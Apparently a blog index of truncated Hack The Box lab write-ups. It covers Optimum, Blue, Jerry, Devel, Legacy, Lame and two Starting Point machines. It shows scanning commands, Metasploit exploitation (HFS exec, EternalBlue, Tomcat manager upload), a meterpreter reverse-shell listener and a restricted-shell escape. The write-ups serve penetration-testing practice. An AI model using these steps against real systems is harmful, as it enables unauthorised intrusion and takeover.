HTB Optimum

$nmap -A -sV -p- $nikto -h $searchsploit hfs $cat /usr/share/exploitdb/exploits/windows/remote/346 msf5 > search hfs msf5 > use 1 msf5 exploit(windows/http/rejetto_hfs_exec) > options msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost msf5 exploit(windows/http/rejetto_hfs_exec) > run meterpreter > ls meterpreter > cat user.txt.txt meterpreter > getuid meterpreter > sysinfo Sysinfo shows that we are in a Windows 2012 R2 server with x64 bits architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV Result analysis:   135: windows rpc 139: smb  445: smb  OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) $nmap -p 445 –script vuln msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > options msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit C:\Windows\system32>whoami C:\Users>dir C:\Users>cd haris C:\Users\haris>cd Desktop C:\Users\haris\Desktop>dir C:\Users\haris\Desktop>type user.txt C:\Users>cd Administrator C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>dir C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e $nikto -h Access to  Use credentials found on Nikto’s results (tomcat/s3cret) As we can observe, we are able to upload and deploy a WAR file. msf5 > use exploit/multi/http/tomcat_mgr_uploadmsf5 exploit(multi/http/tomcat_mgr_upload) > options msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost msf5 exploit(multi/http/tomcat_mgr_upload) > set

Create a Metasploit listener

Steps to create a Metasploit listener: msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost msf5 exploit(multi/handler) > set lport 9999 msf5 exploit(multi/handler) > set ExitOnSession false msf5 exploit(multi/handler) > exploit -j sessions -i 1

(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable

Using Metasploit I’ve sometimes seen this error:  [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: ( To solve it:  List processes listening on port 1234 lsof -i :1234 Kill a process with process ID 5678 kill -9 5678

HTB Devel

 $nmap -T4 -sV -p- -A Open ports detected: 21/tcp open  ftp     Microsoft ftpd 80/tcp open  http    Microsoft IIS httpd 7.5  $nikto -h $nmap -p 80 –script vuln $nmap -p 21 –script vuln  $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt Nothing much useful was found until this point. $ftp ftp> dir ftp> put test.txt ftp> dir So, if we can upload any file, can we

HTB Legacy

$sudo nmap -A -T4 -p- Open ports detected: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Based on the detected ports, we have SMB here. $ msfconsole msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > options msf5 auxiliary(scanner/smb/smb_version) > run Which smb version do we have? Not sure yet… $nmap -p139 –script smb-protocols -Pn $nmap -p445 –script smb-protocols -Pn According to

HTB Lame

 $nmap -T4 -p- -A -Pn Open ports detected: 21/tcp  open  ftp vsftpd 2.3.4 22/tcp  open  ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp  open  netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))  $ftp No files are detected.  $ssh  $msfconsole Install Searchsploit $sudo apt update && sudo apt -y install exploitdb$searchsploit

HTB Starting Point – Base

$./ Ports detected:22/tcp open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open  http Apache httpd 2.4.29 ((Ubuntu)) $gobuster dir -u -w /usr/share/wordlists/dirb/big.txt Interesting items found: /_uploaded and /login Access to The login folder can be listed (Due to a misconfiguration of the webserver) Foothold Download all three files to analyze them. login.php.swp is a binary file. $ls -la $file login.php.swp As it is described, login.php.swp

HTB Starting Point – Guard

$./ Ssh port is open. Let’s try the last ssh user we obtained.   $ssh -i id_rsa daniel@ The SSH login gives us access to a restricted shell, where the commands like find, cat and python are disabled.  We are unable to read user.txt from this shell. Man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a